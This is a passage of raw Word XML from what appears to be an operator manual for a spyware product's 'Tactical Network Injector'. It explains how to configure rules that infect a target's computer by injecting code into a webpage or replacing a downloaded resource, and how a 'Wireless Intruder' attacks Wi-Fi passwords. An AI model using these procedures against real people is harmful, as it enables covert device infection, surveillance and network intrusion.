        <w:t xml:space="preserve">] if filled automatically by the system, with the string  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84282">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*youtube.com/watch*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image </w:t>
      </w:r>
      <w:r w:rsidR="00302B40">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a possible rule configuration based on </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INJECT-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML-FLASH infection method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC7C23" w:rsidRDefault="00FC7C23" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRPr="00F90ED2" w:rsidRDefault="005448D4" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc372642504"/>
      <w:r w:rsidRPr="00F90ED2">
        <w:lastRenderedPageBreak/>
        <w:t>INJECT-</w:t>
      </w:r>
      <w:r w:rsidR="0059506F" w:rsidRPr="00F90ED2">
        <w:t>HTML-FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90ED2">
        <w:t xml:space="preserve"> Infection Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="005448D4" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The INJECT-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML-FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> infection allows the operator of the Tactical Network Injector to infect a desktop device while the Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is browsing a website on </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Agent is </w:t>
      </w:r>
      <w:r w:rsidR="00FF5CE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">inside </w:t>
      </w:r>
      <w:r w:rsidR="00FF5CE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a specific webpage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and the infection is applied when the Target </w:t>
      </w:r>
      <w:r w:rsidR="00FF5CE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads that page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00302B40" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3638550" cy="3905250"/>
            <wp:effectExtent l="0" t="0" r="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38550" cy="3905250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRPr="00636A0A" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="0010013A" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.7</w:t>
      </w:r>
      <w:r w:rsidR="00F90ED2" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="00F90ED2">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">System &gt; Network Injectors &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00F90ED2" w:rsidRPr="00171249">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Network Injector #</w:t>
      </w:r>
      <w:r w:rsidR="00F90ED2">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Add a new rule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="008B7564" w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INJECT-</w:t>
      </w:r>
      <w:r w:rsidR="008B7564">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML-FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> infection method must be selected when creating a new rule, through the field [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ].</w:t>
      </w:r>
      <w:r w:rsidR="008B7564">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The field [</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] also need to be filled with the URL of the </w:t>
      </w:r>
      <w:r w:rsidR="008B7564">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">webpage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to infect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302B40" w:rsidRDefault="00302B40" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The field [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00302B40">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] lets you select the file that contains the lines of code that will be automatically added to the original webpage once loaded by the Target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F90ED2" w:rsidRDefault="00F90ED2" w:rsidP="00F90ED2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image </w:t>
      </w:r>
      <w:r w:rsidR="00302B40">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a possible rule configuration based on INJECT-</w:t>
      </w:r>
      <w:r w:rsidR="00302B40" w:rsidRPr="00302B40">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00302B40">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML-FILE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>infection method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302B40" w:rsidRDefault="00302B40">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0059506F" w:rsidRPr="00D7493F" w:rsidRDefault="0059506F" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc372642505"/>
      <w:r w:rsidRPr="00D7493F">
        <w:lastRenderedPageBreak/>
        <w:t>REPLACE Infection Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="0059506F" w:rsidRDefault="0059506F" w:rsidP="0059506F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REPLACE</w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> infection allows the operator of the Tactical Network Injector to infect a desktop device while the Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is browsing a specific URL resource on </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Agent is injected inside the Target’s network traffic replacing the original URL resource.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3638550" cy="3905250"/>
            <wp:effectExtent l="0" t="0" r="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8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38550" cy="3905250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRPr="00636A0A" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="0010013A" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.8</w:t>
      </w:r>
      <w:r w:rsidR="00D7493F" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="00D7493F">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">System &gt; Network Injectors &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D7493F" w:rsidRPr="00171249">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Network Injector #</w:t>
      </w:r>
      <w:r w:rsidR="00D7493F">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Add a new rule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The REPLACE infection method must be selected when creating a new rule, through the field [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]. The field [</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>] also need to be filled with the URL of the resource to infect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The field [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00302B40">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] lets you select the file that will replace the original resource requested by the Target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D7493F" w:rsidRDefault="00D7493F" w:rsidP="00D7493F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The image above shows a possible rule configuration based on REPLACE infection method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92909" w:rsidRDefault="00D92909">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92909" w:rsidRPr="0041409B" w:rsidRDefault="00D92909" w:rsidP="00D92909">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc372642506"/>
      <w:r w:rsidRPr="0041409B">
        <w:lastRenderedPageBreak/>
        <w:t>Wireless Intruder Usage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00D92909" w:rsidRDefault="00D92909" w:rsidP="00D92909">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006758E3" w:rsidRDefault="00EB4FF7" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="006758E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireless Intruder allows to access a protected Wi-Fi network by identifying the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4FF7" w:rsidRDefault="00EB4FF7" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4FF7" w:rsidRDefault="006758E3" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In order to make the Wireless Intruder tool works, you’ve to specify:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006758E3" w:rsidRDefault="006758E3" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006758E3" w:rsidRDefault="006758E3" w:rsidP="006758E3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireless interface: the wireless network card to use in order to attack the wireless network;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006758E3" w:rsidRDefault="006758E3" w:rsidP="006758E3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireless network: the Wi-Fi network to attack;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006758E3" w:rsidRPr="006758E3" w:rsidRDefault="006758E3" w:rsidP="006758E3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attack type: the attack to be used in order to find the wireless network password;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C5322E" w:rsidRDefault="00C5322E" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4FF7" w:rsidRDefault="0041409B" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6115050" cy="4581525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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7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rsidR="00EB4FF7" w:rsidRPr="002D7F2D" w:rsidRDefault="00EB4FF7" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4FF7" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.9</w:t>
      </w:r>
      <w:r w:rsidR="00EB4FF7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00EB4FF7">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tactical Control Center</w:t>
      </w:r>
      <w:r w:rsidR="00EB4FF7" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:r w:rsidR="00EB4FF7">
        <w:rPr>
